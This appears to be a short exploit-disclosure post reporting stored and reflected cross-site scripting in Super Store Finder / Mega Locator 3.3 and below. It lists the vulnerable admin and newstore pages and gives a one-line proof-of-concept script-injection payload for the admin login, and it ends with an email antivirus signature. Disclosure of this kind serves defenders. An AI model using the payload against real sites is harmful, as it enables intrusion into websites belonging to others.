Super Store Finder versions 3.3 and below suffer from a cross site scripting vulnerability.
f3054c541bd045c5e5cb66e6cb59003d
######################################################################################
# Exploit type : XSS INJECTION
# Exploit title : Super Store Finder Add location XSS Injection
# Descriptions : XSS injection from adding store
# and reflected XSS in SQL error login page
# PHP Script affected : Super Store Finder | Mega Locator
# Plugin URI : http://www.superstorefinder.net/
# Version : 3.3 and Below
# Exploit Author : Eagle Eye
# Plugin Author : Joe Iz
# Tested On : Windows
# Date : 11/14/2020
# Vuln Page : <website>/superstorefinder/admin/
# <website>/superstorefinder/newstore.php
# <website>/megalocator/admin/
# Payload(admin login) : ' <script>alert(1);</script>
#######################################################################################
<https://www.avast.com/sig-email?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=webmail>
Virus-free.
www.avast.com
<https://www.avast.com/sig-email?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=webmail>
<#DAB4FAD8-2DD7-40BB-A1B8-4E2AA1F9FDF2>